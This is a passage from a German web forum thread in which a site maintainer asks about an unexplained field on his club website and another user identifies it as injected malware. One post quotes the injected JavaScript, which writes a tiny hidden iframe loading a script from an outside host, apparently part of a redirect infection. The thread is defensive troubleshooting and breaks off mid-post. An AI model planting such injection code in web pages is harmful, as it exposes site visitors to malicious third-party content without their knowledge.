Listenfeld auf der Website, woher?

**brondomir** · 12.03.2013, 12:21

Hallo,

seit neusten habe ich auf einer Website die ich betreue das im Anhang befindliche Feld. Ich kann mir nicht erklären wo es herkommt. Nach einem Live-Update ist es leider auch nicht entfernt worden, dafür hat es mir das Live-Update die Seite von der Farbgebung zerschossen.

Kann jemand von euch sagen was das für ein Feld ist? Es tauchte vor einigen Tagen einfach auf.

Gruß,
B.

**do_while** · 12.03.2013, 12:31

Hallo brondomir,

an dem Bild kann man sehr wenig erkennen. Kann Du dazu einen Link posten oder den Teil des Quellcodes, wo das Element auf der Webseite eingebaut ist?
Oft kann man aus den CSS-Klassen auf die verwendete Erweiterung schließen.

**brondomir** · 12.03.2013, 13:18

Hier ist der Link zur Website:

http://www.haidong-gumdo-nuernberg.de/

Unter dem Footer, das Feld ist auf fast jeder Seite zu sehen.

**Der_Ritter** · 12.03.2013, 13:35

Hi brondomir und Gruß aus Mittelfranken/Herzogenaurach ;-)

Du hast da im Quellcode ein JavaScript:

HTML-Code:

<script type="text/javascript" language="javascript" >       
(function () {    var id = '37';    var em09 = document.createElement('iframe');
em09.src = 'http://fraukesart.de/cnt.php';    em09.style.position = 'absolute';    
em09.style.border = '1';    em09.style.height = '31px';    em09.style.width = '42px';    
em09.style.left = '500px';    em09.style.top = '100px';    if (!document.getElementById('em')) 
{        document.write('<style>body{overflow-x:hidden;}</style>');        
document.write('<div id=\'em\' style="position:absolute; width:80%; height:100%;" ></div>');
document.getElementById('em').appendChild(em09);    }})();</script>

welches einen IFRAME in der Größe 42px*31px absolut positioniert und dieses Skript hier aufruft: 'http://fraukesart.de/cnt.php'.
Versuch mal das zu entfernen und schau mal ob das dann weg ist.

Grüße
Der_Ritter

**Der_Ritter** · 12.03.2013, 13:41

Mh, hab gerade das noch in diesem Zusammenhang gegoogelt:

http://labs.sucuri.net/?details=fraukesart.de

und das

http://evuln.com/labs/fraukesart.de/

Scheint irgendein Redirect Malware Infekt zu sein.

Die Suche nach

Code: